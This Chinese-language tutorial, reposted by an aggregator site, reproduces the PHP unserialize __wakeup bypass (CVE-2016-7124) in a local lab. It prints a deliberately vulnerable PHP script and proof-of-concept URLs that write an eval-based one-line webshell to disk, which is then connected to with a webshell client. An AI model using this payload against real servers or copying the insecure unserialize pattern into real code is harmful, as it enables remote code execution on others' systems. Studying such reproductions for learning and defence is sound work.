CVE-2016-7124php反序列化漏洞复现
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了CVE-2016-7124php反序列化漏洞复现,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2067字,纯文字阅读大概需要3分钟。
内容图文
CVE-2016-7124php反序列化漏洞复现
0X00漏洞原因
如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行
0X01漏洞影响版本
PHP5 < 5.6.25
PHP7 < 7.0.10
0X02漏洞详情
PHP(PHP:HypertextPreprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。PHP5.6.25之前版本和7.0.10之前的7.x版本中的ext/standard/var_unserializer.c文件存在安全漏洞,该漏洞源于程序没有正确处理无效的对象。远程攻击者可借助特制的序列化数据利用该漏洞造成拒绝服务。
0X03漏洞复现环境搭建
使用Windows10操作系统,搭建phpStudy一键集成环境搭建web服务。
这里需要将php版本设置为有漏洞的版本。
我这里使用的是php5.4.45+apache+mysql一键集成环境
0X04漏洞复现
搭建好后,我们首先需要编写测试脚本
测试脚本如下:
<?php class test{ public $name = "faairy"; public function __wakeup(){ echo "this is __wakeup<br>"; } public function __destruct(){ echo "this is __destruct<br>"; } } $str = $_GET["s"]; @$un_str = unserialize($str); echo $un_str->name."<br>"; ?>
脚本上标明接收s参数,对其反序列化后输出name属性的值。
编写poc访问该脚本:
Poc为http://127.0.0.1/test2.php?s=O:4:"test":1:{s:4:"name";s:5:"fairy";}
访问结果如下图所示:
根据访问结果可以看到反序列化之前先调用了__wakeup 方法,再调用_destruct 方法。
将传入的序列化数据的对象变量个数由1更改为2,页面只执行了__destruct方法,而且没有输出name,是由于反序列化数据时失败无法创建对象。
修改测试脚本如下:
<?php class test{ public $name = "fairy"; public function __wakeup(){ echo "this is __wakeup<br>"; foreach(get_object_vars($this) as $k => $v){ $this->$k = null; } } public function __destruct(){ echo "this is __destruct<br>"; $fp = fopen("D:\\phpstudy\\PHPTutorial\\WWW\\2333.php","w"); fputs($fp,$this->name); fclose($fp); } } $str = $_GET["s"]; @$un_str = unserialize($str); echo $un_str->name."<br>"; ?>
构造Poc进行写入一句话木马操作。
Poc为:http://127.0.0.1/test3.php?s=O:4:"test":1:{s:4:"name";s:29:"<?php @eval($_POST[‘123‘]);?>";}
执行后结果如下图所示:
在对应的文件夹找到刚刚写入的文件,发现文件中内容为空,没有一句话木马,说明写入失败。
失败原因为:__destruct方法在调用时将name参数写入wcute.php文件但是由于__wakeup方法清除了对象属性,所以在调用__destruct时已经没有了name属性,因此文件将会写入失败。
将Poc中对象属性个数改为2继续尝试
Poc为:http://127.0.0.1/test3.php?s=O:4:"test":2:{s:4:"name";s:29:"<?php @eval($_POST[‘123‘]);?>";}
执行后如下图所示:
在对应的文件夹找到该文件发现文件中被写入了一句话木马。
如图所示:
使用菜刀连接发现连接成功,如下图所示
原文:https://www.cnblogs.com/L0ading/p/12704096.html
内容总结
以上是互联网集市为您收集整理的CVE-2016-7124php反序列化漏洞复现全部内容,希望文章能够帮你解决CVE-2016-7124php反序列化漏洞复现所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。